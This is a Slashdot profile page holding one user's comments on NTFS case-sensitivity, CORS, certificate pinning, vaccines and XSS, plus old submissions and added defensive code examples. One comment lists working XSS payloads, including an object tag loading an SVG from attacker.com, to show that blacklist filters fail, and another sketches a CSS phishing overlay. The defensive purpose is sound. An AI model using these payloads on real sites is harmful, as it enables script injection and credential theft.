Comments


Critical Git Security Vulnerability Announced

cbhacking Re:Mac OS X does support case-sensitive filesystem (58 comments)

So does Windows, though you may confuse the Win32 API if you use it. NTFS is case-preserving and the native APIs are case-sensitive. Win32 functions can use FILE_FLAG_POSIX_SEMANTICS to require case-sensitivity, and Interix (Microsoft's POSIX-on-NT environment that runs in the Subsystem for Unix Applications or SUA) does so by default. I don't know of any way to make Win32 case-sensitive by default without doing some kind of crazy hooking of the relevant APIs or installing a filter driver to enforce it.

3 hours ago

Critical Git Security Vulnerability Announced

cbhacking Re:I blame Microsoft (58 comments)

Actually, Microsoft themselves has an API for accessing NTFS drives in a case-sensitive manner, and I'm not talking about the native NT API or even the FILE_FLAG_POSIX_SEMANTICS Win32 file API flag. All versions of NT from 3.1 (the first) to 6.2 (Win8; it was removed from 8.1) have support for a POSIX operating environment - basically a full Unix-like OS running atop the NT kernel - and for proper Unix-like-ness it is case sensitive.

Mind you, Win32 programs do tend to get confused by it all. For example, CMD's "dir" command will list both "test.txt" and "TEST.TXT" in the same directory, and even correctly note if they have different sizes or datestamps. However, the "type" command (print file contents) on *either* name (or some other-cased version of the name) will instead print the contents of one of the files - doesn't matter what you type, the OS will pick - and it will print it twice (once for each copy of the file with that name).

I've been using the Interix (name of the Unix-like operating environment that runs in the NT POSIX subsystem, as reported by the uname command) build of git for years now. I should probably stop - the repo my package manager used has died, and I haven't bothered to set up a different package manager yet so my packages are outdated - but I am, humorously enough, not vulnerable to this particular attack even with that outdated version.

3 hours ago

Ars Reviews Skype Translator

cbhacking Re:One annoyance... (33 comments)

I was just about to say... this is a preview. I wouldn't expect pre-release versions of the new feature to be rolled out across all platforms. We can hope that it will happen once the feature leaves beta, though.

5 hours ago

Reaction To the Sony Hack Is 'Beyond the Realm of Stupid'

cbhacking Re:Actually (493 comments)

And no navy and air force large enough to protect it as they make their way across the Pacific.

I'm imagining an attack sub commander shooting his tubes empty blowing away converted fishing boats loaded down with soldiers and then wondering what the hell to do about the rest of them. On the other hand, we have torp bombers as well, and those can just go back to base to re-arm. As you say, it's not like North Korea has the air force or navy to protect them against a carrier group.

But yeah, South Korea is in a shitty situation. Strong economy, high-tech society, powerful allies... and within bombardment range of enough heavy artillery to basically reduce their capital city if NK decides to let all their crazy out.

8 hours ago

Verizon "End-to-End" Encrypted Calling Includes Law Enforcement Backdoor

cbhacking Re:This should be free (162 comments)

Well said. More info, for the curious: http://en.wikipedia.org/wiki/C...

A lot of people don't even realize that web browsers have the ability to generate key-pairs of which only the public portion is ever sent to a CA or anybody else. It's actually a fairly sane system. If you need to export the private key (for example, to copy it from your PC to your phone, or to back it up) then you have to do so through the web browser or through whatever keystore it uses (Windows, for example, has a built in one you can access through certmgr.msc, though Mozilla products use their own store instead of the system-wide one).

2 days ago

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:JPEG2000 replaced JPEG (377 comments)

Preflight is only required for non-standard verbs or non-standard headers. If you're just requesting data (rather than trying to take some action on the server), preflight is not used.

5 days ago

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Re:Vaccines are totally safe (1039 comments)

Similarly, the highly-infectious diseases that the current generation of American parents grew up with - chicken pox, the flu, etc. - tend to have minor effects. Some people die of them every year, but the number is minuscule and most people show no sign of having ever been sick a week after the infection runs its course. Compare with things like Polio (used to kill people by paralyzing their chest so they couldn't breathe and suffocated where they lay, though more often it simply left you with misshapen and crippled limbs for life), Smallpox (scars covering your body even if you made an otherwise-full recovery), and so on. I'll bet a lot of the anti-vaccination crowd, whether they know it or not, think that even if they get infected it'll basically mean they have to stay home from school/work for a few days, maybe take some medicine. They don't ever think about things like being confined to iron lungs (not that we use those anymore, but hospitals used to have entire wards full of them)...

about a week ago

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Hoping you aren't vaccinated against logic... (1039 comments)

Slippery slope fallacy ahoy! Just because one decision is made for a sound and logical reason of communal good does *NOT* mean that other (unjustified) decisions will be made even if they are promoted on the basis of communal good. Each choice needs to be evaluated on its own merits. Just because some idiots or fraudsters will try to claim that something unwise should be "done for the greater good" doesn't mean doing things for the greater good is invalid as a reason to do things, and the reverse is also true.

Incidentally, did you know that the government is already empowered to arrest you for spreading infectious diseases? If you knowingly infect other people, or if there's an outbreak and you attempt to violate it, you can be prosecuted as a criminal.

Mind you, if you want to withdraw from society and go live in your own little 21st-century equivalent of a leper colony with all the other plague vectors, be my guest. You won't get many visitors - nobody can be 10% sure a vaccine will protect them, so we are all potentially dependent on herd immunity - but you are sure as hell not welcome to freeload on our herd immunity without a valid medical reason!

about a week ago

Time To Remove 'Philosophical' Exemption From Vaccine Requirements?

cbhacking Re:No (1039 comments)

Your driver's license (or other ID card) seems like one option. If you get found with the "unvaccinated" sticker on your card (sort of like the "organ donor" sticker, but for people who want to endanger others rather than save them) in a public place and aren't masked or whatever, it's a fine. Or maybe you just get thrown out of the establishment. Have fun going to bars (or buying alcohol at a store), or doing much of anything else that requires ID.

This *sounds* awful - a government-mandated mark of belonging to an unpopular minority - but it's a self-selected minority that puts all the rest of us at risk. I see no reason that people intentionally acting as potential plague carriers should be able to hide among the general populace. Maybe if they had to show their true colors they could get through their thick skulls just how horrible what they're doing is...

about a week ago

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:JPEG2000 replaced JPEG (377 comments)

Boosting the signal, for those who don't read ACs:

CORS (Cross-Origin Resource Sharing) is explicitly intended to support things like CDNs. It lets you make cross-domain XHRs (and access the responses), so the JavaScript-based decoder will work perfectly. It adds minimal additional bandwidth requirement over a standard cross-domain GET (one short extra header on request, a couple on response), is supported on all mainstream browsers, and is much more secure than stupid hacks like JSON-P (though that would work here too, if for some reason you wanted to live in last decade's terrible work-arounds for same-origin policy).

http://en.wikipedia.org/wiki/C...

about a week ago
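
An added example, not part of either CORS comment above or of any browser's code: a simplified model of the two checks those comments describe, namely when a cross-origin request triggers a preflight and when script may read the response. The function names and the sample origins are hypothetical; the rules are a subset of the Fetch standard's (the Range header and header-length limits are left out).

```python
# Methods and script-set request headers that never trigger a preflight.
SAFE_METHODS = {"GET", "HEAD", "POST"}
SAFE_HEADERS = {"accept", "accept-language", "content-language", "content-type"}
SAFE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def needs_preflight(method, headers):
    """True if the browser must send an OPTIONS preflight first.

    `headers` holds only headers set by script; headers the browser adds
    itself (Origin, User-Agent, ...) are not counted.
    """
    if method.upper() not in SAFE_METHODS:
        return True
    for name, value in headers.items():
        lname = name.lower()
        if lname not in SAFE_HEADERS:
            return True
        if lname == "content-type":
            # Parameters such as "; charset=utf-8" do not matter here.
            mime = value.split(";", 1)[0].strip().lower()
            if mime not in SAFE_CONTENT_TYPES:
                return True
    return False


def response_readable(origin, response_headers, with_credentials=False):
    """True if script running on `origin` may read the cross-origin response."""
    hdrs = {k.lower(): v for k, v in response_headers.items()}
    allow = hdrs.get("access-control-allow-origin")
    if allow is None:
        return False
    if with_credentials:
        # The wildcard is not accepted for credentialed requests.
        return (allow == origin
                and hdrs.get("access-control-allow-credentials") == "true")
    return allow in ("*", origin)


def cdn_image_fetch():
    """Constructed case: a page fetching image data from a CDN with a plain GET."""
    origin = "https://site.example"
    preflight = needs_preflight("GET", {})
    readable = response_readable(origin, {"Access-Control-Allow-Origin": "*"})
    return preflight, readable


if __name__ == "__main__":
    print("CDN image GET:", cdn_image_fetch())
    print("PUT:", needs_preflight("PUT", {}))
    print("POST JSON:", needs_preflight("POST", {"Content-Type": "application/json"}))
    print("GET + X-Requested-With:",
          needs_preflight("GET", {"X-Requested-With": "XMLHttpRequest"}))
```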

Bellard Creates New Image Format To Replace JPEG

cbhacking Re:Compare to... (377 comments)

I realize that this is Slashdot and we have a great tradition of not RTFA, but given that this is about an image format you could at least go LATFP (Look At The Fucking Pictures). It's also an impressive display of how well image decoding using JavaScript works (but then, this is the guy who wrote an entire x86 emulator capable of running Linux using JS, and even made it work on IE; I have no doubt as to the man's skill in that realm).

Link for image format and quality comparisons: http://xooyoozoo.github.io/yol...
Link for info about the image format and links to more comparisons: http://bellard.org/bpg/

about a week ago

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:KCM vulnerable to MITM from day one (237 comments)

Well, you can pre-pin a cert (Google does this with their own properties, for example, and as of Firefox 32, Firefox does it for Mozilla stuff and I think some Google stuff). You can also always manually check a certificate's fingerprint before you send any data over it. That leaves the question of what you check it against, of course, but that's the whole key distribution problem; at some level you have to have a trusted source of key identity.

I really do wish there was more support for TOFU (Trust On First Use) in browsers today, though. For example, I *can* explicitly trust a self-signed certificate for example.com. However, if I later get a different cert for example.com, my browser will simply evaluate it the way it would evaluate any cert (for example, if it's signed by a Chinese government-controlled CA, the browser will trust it unless I've removed trust for that CA). None of the major browsers will stop and say "Hey, that is *NOT* the cert I expect for this site!" the way SSH (or Remote Desktop, for that matter, which also uses TOFU) will. This greatly irks me. Certificates don't change that often, and most of the time it's just an update to the expiration date or adding a new subdomain or something else innocuous like that. Even a change to the public key isn't that big a concern, especially if the old key is revoked; people rotate keys sometimes as a matter of good practice. But a change to the CA, or a change to a pinned leaf node (where I basically said "this shouldn't change"), ought to raise warning flags.

about two weeks ago
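
An added example, not from the comment above or from any browser: a small trust-on-first-use store that applies the policy the comment asks for, tolerating reissued certificates and key rotation under the same issuer but warning on a changed CA or a changed pinned leaf. The class and field names are hypothetical, the certificate bytes are constructed placeholders rather than real DER, and the fields are assumed to have been extracted from the handshake already.

```python
import hashlib
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    FIRST_USE = "first use, recorded"
    UNCHANGED = "same certificate as before"
    REISSUED = "new certificate, same key and issuer"
    KEY_ROTATED = "new key, same issuer"
    ISSUER_CHANGED = "WARNING: issuer (CA) changed"
    PINNED_LEAF_CHANGED = "WARNING: pinned leaf certificate changed"


@dataclass(frozen=True)
class Observation:
    """What the client saw in one TLS handshake."""
    cert_der: bytes   # whole leaf certificate
    spki_der: bytes   # its SubjectPublicKeyInfo
    issuer: str       # issuer distinguished name


def fingerprint(data):
    return hashlib.sha256(data).hexdigest()


class TofuStore:
    """Per-host memory of the last accepted certificate.

    This check runs in addition to normal chain validation, not instead of it.
    """

    def __init__(self):
        self._known = {}

    def pin_leaf(self, host):
        """The user says: this exact certificate should not change."""
        self._known[host.lower()]["pinned"] = True

    def check(self, host, obs):
        seen = {
            "cert": fingerprint(obs.cert_der),
            "spki": fingerprint(obs.spki_der),
            "issuer": obs.issuer,
        }
        known = self._known.get(host.lower())
        if known is None:
            self._known[host.lower()] = dict(seen, pinned=False)
            return Verdict.FIRST_USE
        if seen["cert"] == known["cert"]:
            return Verdict.UNCHANGED
        # The two warning cases leave the stored record untouched.
        if known["pinned"]:
            return Verdict.PINNED_LEAF_CHANGED
        if seen["issuer"] != known["issuer"]:
            return Verdict.ISSUER_CHANGED
        # Same issuer: report the change, then remember the new certificate.
        same_key = seen["spki"] == known["spki"]
        known.update(seen)
        return Verdict.REISSUED if same_key else Verdict.KEY_ROTATED


def demo():
    """Constructed sequence of handshakes with one host."""
    ca_a, ca_b = "CN=Example CA A", "CN=Example CA B"
    first = Observation(b"cert-1", b"key-1", ca_a)
    renewed = Observation(b"cert-2", b"key-1", ca_a)      # new expiry date
    rotated = Observation(b"cert-3", b"key-2", ca_a)      # new key pair
    other_ca = Observation(b"cert-4", b"key-3", ca_b)     # different CA
    after_pin = Observation(b"cert-5", b"key-2", ca_a)    # reissue after pinning
    store = TofuStore()
    sequence = (first, first, renewed, rotated, other_ca, rotated)
    verdicts = [store.check("example.com", obs) for obs in sequence]
    store.pin_leaf("example.com")
    verdicts.append(store.check("example.com", after_pin))
    return verdicts


if __name__ == "__main__":
    for verdict in demo():
        print(verdict.value)
```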

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:512-bit self-signed certs (e.g. DD-WRT) (237 comments)

Um... I hate to rain on your Mozilla parade here, but Chrome has full certificate pinning for Google properties, and has had it for quite a few versions now. Using any unexpected cert, no matter how trusted, for a Google property (or the handful of others that Chrome supports) will be detected and blocked. Mozilla has certificate pinning now as well, but only since version 32 (which is what, a month ago?). If the organization in question wanted to MitM Firefox's traffic as well as Chrome's, they would (until recently) have found it much easier to do on Firefox than on Chrome.

about two weeks ago

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Re:Comodo's certificate extortion (237 comments)

Sigh... I can't tell if you're arguing this because you don't understand the English language, or if you're just trolling.

If somebody has to "be presenting their own" certificate, then they are NOT PASSIVE!! A passive network attacker is, for example, somebody sitting at a coffee shop with the WiFi card in promiscuous mode, watching all the traffic that gets sent over that (open) network. In that position, the attacker cannot do a damn thing about a self-signed cert. Now, if they are able to use ARP spoofing or DNS hijacking or can configure the router's upstream host or something like that, then they can intercept traffic and present their own certificate, sure. That requires an *active* attack, though.

The reason that passive attacks are so concerning right now is that it's pretty trivial for ISPs and governments to record all network traffic that they want to. It just costs money for storage and storage bandwidth. However, they aren't actively intercepting that traffic, just passively recording it for later data mining. TLS, even using anonymous Diffie-Hellman or a self-signed certificate, is sufficient to completely defeat that kind of monitoring.

You're basically arguing that since an armored car can't take a hit from the cannon of a main battle tank, there's no point in armoring them at all and it would be better for them to go unarmored so as not to lure people into a false sense of security. Turns out that's bullshit: the typical threat to people moving valuables is from small arms (which an armored car can shrug off just fine), and the typical threat to browser privacy is from pervasive passive monitoring, which self-signed certs defeat. Not that I would ever argue that it's better to have a self-signed cert than a CA-signed one, but it's not as *much* worse as you seem to think.

Besides, there's things you can do to make a self-signed cert even more secure. For example, you (the user) can add *just that cert* to your trust store. Now, if an attacker tries to substitute their *own* self-signed cert, your browser should object, or at least won't show the site as truly secured. For applications (including a few browsers) that support certificate pinning, this can also be used with self-signed certs in a trust-on-first-use basis (take a look at, for example, HTTP Public Key Pinning).

about two weeks ago

Firefox 34 Arrives With Video Chat, Yahoo Search As Default

cbhacking Konqueror (237 comments)

Konqueror is still pretty decent. These days it generally uses WebKit (which was built from Konqueror's KHTML engine originally). I like its interface and generally high utility.

Aside from being in the package repos for pretty much all desktop Linux and BSD variants, it's also available for Windows. Haven't checked for Mac, but it's probably available there too.

about two weeks ago

Intel Core M Notebooks Arrive, Lenovo Yoga 3 Pro Tested

cbhacking Re:so close to perfect (78 comments)

Assuming it's like my Yoga 2 Pro, which seems likely, you can toggle the default behavior of those keys from special-function mode to F-key mode (hold Fn to reverse that, of course). It's in the BIOS/UEFI setup, same place it has been on the last ~5 years (maybe longer?) of Lenovo hardware.

about three weeks ago

Google Chrome Will Block All NPAPI Plugins By Default In January

cbhacking Re:Dropping NPAPI broke VMware consoles on Linux (107 comments)

Stupid and kludgey hack, but is it possible to solve this, at least to a degree, with Wine? Running either the Windows version of Flashplayer (in something like nspluginwrapper; I think I remember hearing about a way to do this though I never tried it) in a Linux browser, or running a full Windows browser (can Wine do that these days?) seems like it solves the problem. It introduces at least one problem, too, of course... but at least you *can* install updates instead of pinning to a version that will only get more outdated...

about three weeks ago

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

it's a near impossibility to site a solar panel on a sailboat that is entirely shade free for the entire length of the day

That's probably true of a reasonably-sized monohull, but Ocelot is a cat. Setup is 4x 120W Kyocera panels out over the dinghy davits (we have a lot of room back there and it doubles as a shade for the rear of the cockpit). You can read a bit more about them here (photos are outdated in general but we haven't modified the array since they were taken): http://svocelot.com/Ocelot/mod...

Having the panels so far aft and so high provided some protection from salt spray (enough that they don't need cleaning after any but the roughest passages, the kind where the whole boat needs a good rain rinse) and also kept them out of the line of most of our shadows. If the sun sets or rises directly in line with the panels and mast, then yes, we'll lose that panel, but this can often be remedied by running the boom out to one side (tied down with the jibe preventer) and letting the (relatively huge) sail protector swing the boat a few degrees away from pointing dead into the wind. By anywhere close to the hours when the sun is at full power, even our slightly-raked mast just isn't far enough back to shade the panels. (As a side note, it occurs to me that this may explain why the ramp up to full power took longer in the morning than evening; if the easterly winds meant the panels were occasionally shaded in the early morning, we'd only have 3/4 the nominal power production for that much insolation.)

As for angle, that definitely cost us some power - our panels are very much immobile, aside from changing the orientation of the entire boat - but I'm not actually sure how much. Even at 60 degrees off apex, which is pretty late in the day (assuming you're right under the sun's path, within +/- 60 degrees is 1/3 of the day, or 8 hours), you still get 50% of the insolation you would get at apex, atmospheric losses aside. That's certainly significant losses, and it drops off sharply after that, but the middle hours of the day are not severely affected.

By the way, nice site! I'll have to ask my folks if they ever ran into Animation coming up the Aus coast. Alternatively, do you know S/V Vamp? Good friends of ours. I'm sorry you posted as AC but I may ping you by email.

about three weeks ago

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re:Regular expressions (41 comments)

<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won\'t work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client\'s blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

about a month ago
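
An added example, not part of the comment above or of WordPress: the comment's payload lines run through a blacklist filter, through the same filter repeated until stable, and through output encoding. The blacklist (delete every "<script") is an assumption, since the filter being replied to is not shown on this page; the alert text is shortened and the attacker URL is a placeholder.

```python
import html
import re

# Payload lines from the comment above, with the alert text shortened and the
# attacker URL replaced by a placeholder (constructed for this example).
PAYLOADS = [
    '<img src="xss" onerror="alert(1)" />',
    '<iframe src="javascript:alert(1)"></iframe>',
    '<object data="http://attacker.example/x.svg"></object>',
    '<scri<scriptpt>alert(1);</script>',
    '<form action="javascript:alert(1)"><input type="submit" /></form>',
    '<h1 onmouseover="alert(1)">REALLY BIG TEXT</h1>',
]

# ASSUMPTION: the blacklist being criticised deletes the substring "<script".
BLACKLIST = re.compile(r"<script", re.IGNORECASE)

# Crude stand-in for "the browser would still parse a tag here": any '<'
# directly followed by a letter. A stray closing tag such as </script> is inert.
OPENING_TAG = re.compile(r"<[A-Za-z]")


def blacklist_once(text):
    """A single pass of the blacklist."""
    return BLACKLIST.sub("", text)


def blacklist_until_stable(text):
    """Re-run the blacklist until the output stops changing."""
    previous = None
    while previous != text:
        previous, text = text, BLACKLIST.sub("", text)
    return text


def encode_for_html(text):
    """Output encoding for HTML body and quoted-attribute contexts.

    URL and JavaScript contexts need their own encoders.
    """
    return html.escape(text, quote=True)


def survivors(defence):
    """Payloads that still contain an opening tag after `defence` is applied."""
    return [p for p in PAYLOADS if OPENING_TAG.search(defence(p))]


if __name__ == "__main__":
    defences = [
        ("blacklist, one pass", blacklist_once),
        ("blacklist, repeated", blacklist_until_stable),
        ("output encoding", encode_for_html),
    ]
    for name, defence in defences:
        left = survivors(defence)
        print(f"{name}: {len(left)} of {len(PAYLOADS)} payloads keep a live tag")
    print("nested tag after one pass:", blacklist_once(PAYLOADS[3]))
    print("encoded img payload:", encode_for_html(PAYLOADS[0]))
```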

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re: Regular expressions (41 comments)

Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

about a month ago

Submissions


Microsoft allowing WP8 users to get updates directly

cbhacking cbhacking writes  |  about a year ago

cbhacking (979169) writes "In June of 2012, Microsoft announced that they would be providing a system whereby "registered [Windows Phone] enthusiasts get early access to updates" without waiting for carrier approval and broad distribution. For more than a year, that has been an unfulfilled promise, and for many users, updates have been delayed or may even still be unavailable. Today, coinciding with the release of WP8 Update 3 (a.k.a. GDR3), Microsoft is allowing "developers" (anybody who has enabled app sideloading on their phone) to opt into a "Windows Phone Preview" program to allow updating immediately.

Like the update itself, this is likely a move in response to consumer demand and comparisons to iOS and Android, as there is little in the update which specifically interests developers. However, the program does warn that participation may invalidate your device's warranty; this may have been required by the carriers to relieve concerns of high support costs in the event of a botched update. While only the Microsoft portion of the updates (as opposed to driver firmware or OEM customizations) are available through this program, participating phones will also continue to receive public updates as they are rolled out."

Zune 3.0: Wireless Purchase, Games, 16GB

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "Microsoft released the Zune 3.0 yesterday. The device firmware has been immensely upgraded: it now supports connecting to wireless access points, sampling and purchasing music through a built-in store interface, playing games, and several other new things. You can read Microsoft's blurb on what's new at zune.net.

The Windows software has also been improved, better integrating the social features.

Additionally, Zunes are now available in more colors, the 4GB flash player is being discontinued for a 16GB player, and there's now a HDD-based 120GB model."


CrossOver Games released for Linux, OS X

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "CodeWeavers, the company that supports the open-source Wine project that allows running Windows applications on UNIX-like operating systems, has released CrossOver Games for Linux and OS X. The launch includes a considerable list of supported titles, including such popular (and graphically intensive) games as EVE Online, Counterstrike: Source (and other Steam games), and World of WarCraft.

A trial version is also available for download."


Microsoft .NET source to be available for viewing

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "A post on the blog of Microsoft's Scott Guthrie has some exciting news for .NET developers: with the release of Visual Studio 2008 later this year, the .NET Framework 3.5 source code will be released for reference purposes. Most of the libraries, including System.Runtime, System.Security, System.Windows.Forms, and System.Web will be made available with the release of VS2008, with some additional non-core libraries coming later. The code will be available for either standalone download and viewing, or as debugging symbols with associated source for integrated debugging with VS2008.

There's a catch though: although the license abbreviation used in the post, MS-RL, usually refers to the copyleft and OSI-approved Microsoft Reciprocal License (which allows modification and redistribution), the license actually explicitly mentioned and linked to is the Microsoft Reference License, which prohibits modification or redistribution. Although an open-source release of the code would be great, this is still likely to be very helpful for debugging, examining behavior of the libraries, and selecting the correct methods or algorithms for a given situation."

Iraq Whistleblower Imprisoned, Tortured

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Forbes.com has a telling story on the fraud and corruption that has plagued the Iraqi reconstruction efforts and, more frighteningly, the harsh penalties faced by whistleblowers. Many have been vilified, demoted, or fired outright. Now, the story has come out of Navy veteran Donald Vance, who was working as a civilian in an Iraqi company. After reporting to the FBI that his company was making illegal sales of military weapons to customers ranging from State Department workers to Iraqi insurgents, Vance was held without a trial for 97 days in Camp Cropper, an American military prison outside Baghdad. During his time there, he was subjected to "that head-banging music blaring dawn to dusk and interrogators yelling the same questions over and over."

Vance is now back in the USA and, along with a colleague who helped him gather evidence and was treated similarly in return, has filed a federal lawsuit alleging they were illegally imprisoned and subjected to physical and mental interrogation tactics "reserved for terrorists and so-called enemy combatants.""


cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Previously, searching for 'Powertoy Vista' has been a quick road to failure. However, Brandon Paddock, a MS developer, has independently produced and is maintaining a very handy tool called Search++ that adds all kinds of capabilities to the built in desktop search.
Some of the standard features are things like typing 'g <search string>' to launch a Google search, or 'play[artist|album] <name>' to find and start playing music. Another, very nice for those of us who start almost all programs in Vista from the Start menu, is the ability to start programs with elevated permissions via 'sudo <Program>'.
The basic features are great and very easy to use, but Start++ is also extensible and user-modifiable. You can even import additional search tools (called 'Startlets'), and export your own Startlets.
You can download Search++ and additional Startlets here."

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "ABC News has a well-written review of the latest version of the Microsoft Office suite, which has been shipped to manufacturers. Representing the first major upgrade since 2003, Office 2007 has an incredible and instantly visible collection of new features, including an innovative new interface. For those who downloaded the public beta (all ~5 million of us), Office 2007 has already shown itself to be an amazing software suite.

The review includes overall impressions of the new version, plus ratings of the most common individual apps. It is mostly positive, from the easy learning curve for the new interface and the capabilities it offers, to the number of things Microsoft finally got RIGHT, to the good migration tools.

In addition to the many tools and tips the review mentions, I would add the ability of Word to (via plugins) read/write ODF and to export to PDF and Microsoft's new XPS format."

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Pentagon is currently considering options for developing "the ability to strike targets around the world within an hour." According to Space.com, there are several main options being considered: an "Advanced Hypersonic Weapon", placing weapon payloads on small space launch vehicles, fitting missile submarines with a new design of ballistic missile with a conventional payload, or placing conventional warheads on the (traditionally nuclear) Trident missiles our subs currently carry.

Aside from the coolness factor of an autonomous hypersonic vehicle which achieves suborbital altitudes but for the most part flies towards its target like an aircraft, the main advantage of the Advanced Hypersonic Weapon seems to be that it wouldn't be confused with a nuclear launch. Several prominent people, including Ted "Series of Tubes" Stevens, have suggested that using Trident missiles would be dangerous as it may cause other countries to believe we are launching nuclear warheads at them. However, it appears to be the option involving the least re-invention of the wheel, and could be operational "before the end of this decade."

The option of weaponizing space launch vehicles seems to already be facing significant opposition. The Advanced Hypersonic Weapon is receiving some funding, but re-arming the Tridents is out at least until completion of a report on — among other things — the military and political issues.

Is it just me, or aren't there any major reasons the other weapons couldn't be equipped with nuclear warheads anyhow? Do we actually need a different weapon for everything?"

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Windows Vista Team has posted a blog about the "Express Upgrade" program. Basically, if you buy a new computer with XP, Microsoft will make the upgrade to Vista available for a relatively low price.

The edition(s) you can upgrade to through this offer vary by what edition of XP you have. For example, Media Center will upgrade to Vista Home Premium, and Professional or Tablet to Vista Business, for a nominal cost. XP Home can be upgraded to either Vista Home Basic or Premium, for a 50% discount off the normal upgrade pricing. Enterprise and Ultimate are not offered in this list. Note that the upgrade versions of Vista will already cost less than the full retail versions; this program reduces the cost further for people who purchase a PC just before Vista comes out (or shortly thereafter).

It seems that very few people actually upgrade the OS; they simply buy a new computer with the new version. Maybe this program will increase the Vista install base in its first few months?"

Journals


Another major music store offers unrestricted MP3s

cbhacking cbhacking writes  |  more than 7 years ago

When I started the RealNetworks Rhapsody software this morning, I discovered a cause for some celebration by anybody who supports DRM-free music purchases: the Rhapsody store is now offering some unrestricted MP3 downloads. At present only about 5000 albums (roughly 50000 songs) are available, but that is just an initial offer - I haven't even found an announcement anywhere - and they claim to be working to increase the number of MP3 tracks available.

The MP3s are encoded at 256kbps, and cost no more than the standard DRM-crippled music (which is also 256kbps) at 89c/song for subscribing members, or 99c/song for non-subscribers (the subscription gives the ability to listen to streamed music on demand, starting at $13/month). Prices are US dollars, and I don't know whether the service is available internationally.

The bad news: downloading the music requires running the Rhapsody player software (version 4, just released) and at present it's only available on Windows. Online streaming is available to other OSes through http://rhapsody.com/ (works in Firefox, via a plugin) but the cross-platform Real Player software cannot access the music store, and last I tried it wouldn't run in wine.
